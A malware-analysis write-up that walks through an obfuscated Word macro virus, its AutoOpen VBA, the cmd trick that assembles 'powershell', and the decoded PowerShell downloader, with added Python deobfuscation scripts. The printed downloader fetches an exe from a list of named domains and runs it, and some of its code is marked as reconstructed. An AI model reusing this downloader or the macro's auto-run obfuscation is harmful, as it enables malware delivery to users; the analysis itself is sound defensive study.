[Macro Virus] A Simple Analysis of a Word Macro Virus
Preface
I have recently become interested in Office macro viruses, so I found a Word sample online to practise on. The usual macro-virus routine is to use PowerShell to download a PE file from a server and run it, or to embed the PE file in a data stream and have RTF drop and run it.
So analysing a macro virus is usually fairly simple: reading the VBA code is generally enough to see what the virus does. If the functions, variables and strings in the code have all been obfuscated, though, the analysis gets harder.
Detailed Analysis
Luring the user into enabling the macro
If the content is enabled, the macro code runs. Let's first look at the data streams in the document.
Dump the macro code from the "DMSojZquJ" and "wAwJBjJQJ" streams. The code is heavily obfuscated; we start the analysis from the "AutoOpen" subroutine.
```vb
'Attribute VB_Name = "wAwJBjJQJ"
' Pattern used throughout: a junk assignment from a never-defined name, then a
' Mid(decoy string, start, length) slice that yields one or two useful characters,
' which is aliased and finally concatenated into the real string.
Function RTUHFOzsK()
    SSIhYOGKB = BBqMNPjSw
    bkspY = Mid("zYsMfzXjUkZcWdEGwAVSztCl", 12, 1)
    pGHmjw = bkspY
    THZbsWKtF = GApwOicZH
    VEbORpJELT = Mid("w ULjXwAKAb", 2, 2)
    siCAq = VEbORpJELT
    HPhRfOHnm = TOvllapZt
    jpucp = Mid("dwOtbdJnhnCwfmAwZ qUwQ", 18, 2)
    aLAikTZzXH = jpucp
    fqalXfJAK = LCnHkoIcD
    VuuwVO = Mid("sXFWPUriJfKTpqQrVtOvwpYvPcmRpGfQk", 26, 2)
    FItfpaapu = VuuwVO
    OBbLUEjqi = KUOOIoowi
    FVvtMEG = Mid("HdAFDcAsATviDfWzFFzpaz pXJcWfwf", 23, 2)
    ajJRwS = FVvtMEG
    jVrCIfDvl = zLiGcJXbX
    ZrAYDPTq = Mid("iHOvIROFpzkqDsbh OWUdhlpCiwZMTtrODJzmwsH", 17, 2)
    jiAGQiQw = ZrAYDPTq
    SUWWCjAwf = vzuwToFbG
    jmtkTTkrF = Mid("wYuqqVtGZiJmAXAhOSuPBlkv ZpEnSjLlFJZnGcc", 24, 2)
    GcmZjTwn = jmtkTTkrF
    LMtwHYSki = ADrFrhRWc
    NEiTwbDXjd = Mid("ffAMXNhHaz tNilfGXhcTPPsBKcvGidzFR", 11, 2)
    RjvFUJZEqEH = NEiTwbDXjd
    LKTKBJzHw = rAsqBBCLO
    riLqL = Mid("VYSzUNAfirLhNHuvTkkpqTYI NBTb", 25, 1)
    wjCNaFw = riLqL
    iVMwDRCAv = nqFMhzLtQ
    hCfFzWOivq = Mid("HRJzsdTznHRYYLErvnJSVjftUhUujlLVzZfA", 6, 1)
    NBOCDBCM = hCfFzWOivq
    nAKjzzabj = lKCqCjSmA
    bGAdVi = Mid("RMiPstNpOmmrqQf/wzkf", 16, 1)
    uFHPYHoifcS = bGAdVi
    PNGBIBOLR = tiTviHlPK
    BzbiCjnQqm = Mid("AikEQJtLfHomiYXDjK /fbjKtsWuJLaJzImkOi", 19, 2)
    IjUTlUqWHO = BzbiCjnQqm
    EuXMYbiQq = tznZtuwvj
    rZKmALU = Mid("ijpGMkvqVjf zj", 12, 2)
    uGUWvBHvsD = rZKmALU
    ' The slices are concatenated in a different order than they were extracted
    RTUHFOzsK = FItfpaapu + NBOCDBCM + IjUTlUqWHO + GcmZjTwn + uFHPYHoifcS + pGHmjw + jiAGQiQw + RjvFUJZEqEH + siCAq + uGUWvBHvsD + ajJRwS + aLAikTZzXH + wjCNaFw
End Function

' Runs automatically when the document is opened (and macros are enabled)
Sub AutoOpen()
    KlsJVlijz
End Sub
```
The subroutine first calls the "KlsJVlijz" function in the "DMSojZquJ" module. The function body is heavily obfuscated, but from the "Shell" keyword at the end of the function we guess that the virus runs some program or command line.
```vb
' The second Shell argument, 0, hides the program or command line being run
Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + i
```
We modify the code and use the MsgBox function to display the string that gets executed.
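Instead of patching in a MsgBox and running the macro, the same string can be recovered statically. As an added example (not code from the original post or from the sample), a small Python script that replays the Mid() / alias / concatenation assignments and the final Shell$ expression; the VBA it parses is constructed in the sample's style, and all names and strings in it are made up.

```python
import re
# Constructed VBA in the style of the sample's RTUHFOzsK()/KlsJVlijz(): junk assignments
# from never-defined names, Mid() slices of decoy strings, aliasing, concatenation and a
# final Shell$ call. The strings are made up for this example, not the sample's own.
SAMPLE_VBA = r'''
Function Build()
    aaa = bbb
    s1 = Mid("xqPcmdzz", 4, 3)
    t1 = s1
    s2 = Mid("kk /c Hy", 3, 4)
    s3 = Mid("zzecho hiQQ", 3, 7)
    Build = t1 + s2
End Function
Sub AutoOpen()
    Shell$ Build + Chr(34) + s3 + Chr(34), 0
End Sub
'''
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
MID_RE = re.compile(r'^Mid\("([^"]*)",\s*(\d+),\s*(\d+)\)$')
CHR_RE = re.compile(r'^Chr\((\d+)\)$')
SHELL_RE = re.compile(r'^\s*Shell\$?\s+(.+?)(?:,\s*\d+)?\s*$')  # drops the window-style arg

def eval_concat(expr, env):
    """Evaluate `a + Chr(34) + b`; names never given a value are junk and yield ''."""
    out = []
    for term in (t.strip() for t in expr.split('+')):
        m = CHR_RE.match(term)
        out.append(chr(int(m.group(1))) if m else env.get(term, ''))
    return ''.join(out)

def resolve_vba(src):
    """Replay the assignments statically; return (name -> value, recovered Shell lines)."""
    env, shells = {}, []
    for line in src.splitlines():
        m = SHELL_RE.match(line)
        if m:
            shells.append(eval_concat(m.group(1), env))
            continue
        m = ASSIGN_RE.match(line)
        if not m:
            continue  # Function/Sub/End lines carry no string data
        name, rhs = m.groups()
        mid = MID_RE.match(rhs)
        if mid:  # VBA Mid(text, start, length) is 1-based
            text, start, length = mid.group(1), int(mid.group(2)), int(mid.group(3))
            env[name] = text[start - 1:start - 1 + length]
        else:
            env[name] = eval_concat(rhs, env)
    return env, shells
```

Pointing `resolve_vba` at the dumped module text recovers the command line the sample would pass to Shell without ever executing it.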
It turns out that it invokes PowerShell through cmd to run a command.
```
' Pieces together the string "powershell" from environment variables
t %cDpiTrLVN%=wers             ' assigns "wers"
 &&t %SuZmiriSa%=JwsADfCTs     ' junk
 &&t %KlsJVlijz%=po            ' assigns "po"
 &&t %qfSAwAXEM%=MrqzTiJDT     ' junk
 &&t %PqjuFnVOr%=hell          ' assigns "hell"
 &&t %SqYwAARBW%=VcQFWjpkv     ' junk
 &&!%KlsJVlijz%!               ' appends "po"
 !%cDpiTrLVN%!                 ' appends "wers"
 !%PqjuFnVOr%!                 ' appends "hell"
```
Base64-decode the PowerShell command.
The decoded data is obfuscated as well. The way to deobfuscate it is to strip the junk strings and convert the decimal values into the corresponding ASCII characters.
Because the 3, 11, 2 on the first line do not map to displayable ASCII characters, we start from the 36 on the second line, and so on.
The code uses "DownloadFile" to download an exe from the specified servers, uses a random number as the exe's file name, and saves the file to the system temp directory. It then runs the exe with "Start-Process".
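The two decoding layers just described, as an added example in Python (again not from the original post): base64 to UTF-16LE text, which is the form `powershell -e` takes, followed by the decimal-to-character step. The encoded input is constructed here to stand in for the sample's -e argument; the junk separator set and the one-liner wrapper are assumptions, not the sample's own.

```python
import base64
import re

JUNK = "Y&{m:b!~"  # constructed separator set, standing in for the sample's junk characters

def build_sample_encoded_command(plain="Write-Host hi"):
    """Construct a stand-in for the sample's -e argument (not the real payload):
    each character of `plain` becomes its decimal code, codes are separated by junk
    characters, wrapped in a split/convert/join one-liner, then UTF-16LE + base64
    encoded, which is what `powershell -e` expects."""
    parts = [str(ord(c)) for c in plain]
    codes = ''.join(p + JUNK[i % len(JUNK)] for i, p in enumerate(parts[:-1])) + parts[-1]
    ps = f"( '{codes}'.sPLiT('{JUNK}') | %{{[int]$_ -as [char]}} ) -join ''"
    return base64.b64encode(ps.encode('utf-16-le')).decode('ascii')

def decode_powershell_e(b64):
    """Layer 1: `powershell -e` takes base64 of UTF-16LE text, so decode it that way
    (decoding the bytes as ASCII instead gives the familiar A.A.A interleaving)."""
    return base64.b64decode(b64).decode('utf-16-le')

def decimal_codes_to_text(stage1):
    """Layer 2, as the post describes: take the quoted code string, ignore the junk
    separators, and map every decimal value back to its character."""
    m = re.search(r"'([^']*)'", stage1)
    if not m:
        raise ValueError("no quoted code string found")
    return ''.join(chr(int(n)) for n in re.findall(r'\d+', m.group(1)))

def deobfuscate(b64):
    """Full pipeline: base64/UTF-16LE -> decimal codes -> final command text."""
    return decimal_codes_to_text(decode_powershell_e(b64))

if __name__ == '__main__':
    enc = build_sample_encoded_command()
    print(decode_powershell_e(enc))  # the split/convert/join one-liner
    print(deobfuscate(enc))          # Write-Host hi
```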
```powershell
# Decoded PowerShell command (extraction damage repaired: spacing, missing braces)
$wscript = new-object -ComObject WScript.Shell;   # created but never used
$webclient = new-object System.Net.WebClient;
$random = new-object random;
# Download locations, tried in order until one succeeds
$urls = 'agentsinaction.de/NYkSf/,edonnet.de/r/,/SkAU/,markus-fleischmann.de/vWg/,administratiekantoorcleo.nl/tBf/'.Split(',');
# Random number as the dropped exe's file name; the method call was lost in the dump
# and is reconstructed here from the text's description
$name = $random.Next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';
foreach ($url in $urls) {
    try {
        $webclient.DownloadFile($url.ToString(), $path);
        Start-Process $path;
        break;
    }
    catch { write-host $_.Exception.Message; }
}
```
After finishing the code analysis, open the macro code with "Alt+F11", change the Shell window-style argument to 1, and debug to see what happens. Probably because too much time has passed and the servers are no longer up, the code did not execute successfully.
Summary
Those are the basic steps of analysing a macro virus. The subsequent analysis of the PE sample is the same as usual; the only difference is that the virus uses all kinds of obfuscation to hinder analysis. I am also still fairly new at this, so let this article serve as a good start; when I come across other samples later I will analyse and write them up properly.